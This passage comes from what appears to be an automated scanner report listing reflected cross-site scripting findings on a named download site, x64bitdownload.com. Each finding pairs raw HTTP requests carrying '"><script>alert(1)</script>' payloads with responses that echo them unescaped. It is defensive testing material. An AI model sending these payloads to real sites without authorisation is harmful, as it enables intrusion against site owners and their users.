HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:52:48 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1" /> ...[SNIP]...
1.17. http://www.x64bitdownload.com/64-bit-binary-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-binary-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d5c"><script>alert(1)</script>01d31414795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:50 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:59 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7db"><script>alert(1)</script>387ba0d9d20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 16:00:44 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:10:58 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88268
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20" /> ...[SNIP]...
1.19. http://www.x64bitdownload.com/64-bit-board-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-board-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123df"><script>alert(1)</script>9a9ef9bad1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:19 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1" /> ...[SNIP]...
1.20. http://www.x64bitdownload.com/64-bit-boards-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-boards-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1044f"><script>alert(1)</script>58b87c63170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:44 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-boards-downloads.html?1044f"><script>alert(1)</script>58b87c63170=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107a5"><script>alert(1)</script>5d3bbdbca7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:32 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-client-downloads.html107a5"><script>alert(1)</script>5d3bbdbca7a" /> ...[SNIP]...
1.22. http://www.x64bitdownload.com/64-bit-client-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-client-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44255"><script>alert(1)</script>7cf0f112265 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:52:26 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-client-downloads.html?44255"><script>alert(1)</script>7cf0f112265=1" /> ...[SNIP]...
1.23. http://www.x64bitdownload.com/64-bit-conference-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-conference-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32275"><script>alert(1)</script>ad9b1cf51f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:34 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:38 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22conference%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-conference-downloads.html?32275"><script>alert(1)</script>ad9b1cf51f1=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9436b"><script>alert(1)</script>9d161df1015 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:43:14 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:18 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-cross-downloads.html9436b"><script>alert(1)</script>9d161df1015" /> ...[SNIP]...
1.25. http://www.x64bitdownload.com/64-bit-cross-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-cross-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bda"><script>alert(1)</script>b40157044c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22cross%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90546
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-cross-downloads.html?e6bda"><script>alert(1)</script>b40157044c5=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8728"><script>alert(1)</script>1a0285ae469 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:46:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:25 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-download-downloads.htmlb8728"><script>alert(1)</script>1a0285ae469" /> ...[SNIP]...
1.27. http://www.x64bitdownload.com/64-bit-download-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-download-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f31"><script>alert(1)</script>f94cfc1ffad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:43:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:31 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-download-downloads.html?51f31"><script>alert(1)</script>f94cfc1ffad=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e057"><script>alert(1)</script>bfedfe770d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:02 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html1e057"><script>alert(1)</script>bfedfe770d3" /> ...[SNIP]...
1.29. http://www.x64bitdownload.com/64-bit-downloader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-downloader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cabf"><script>alert(1)</script>1c16e82e365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:05:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-downloader-downloads.html?6cabf"><script>alert(1)</script>1c16e82e365=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff5"><script>alert(1)</script>b66c185e6a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:03:08 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5" /> ...[SNIP]...
1.31. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613af"><script>alert(1)</script>6093e6a1fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:12 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab62"><script>alert(1)</script>4dead600d30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
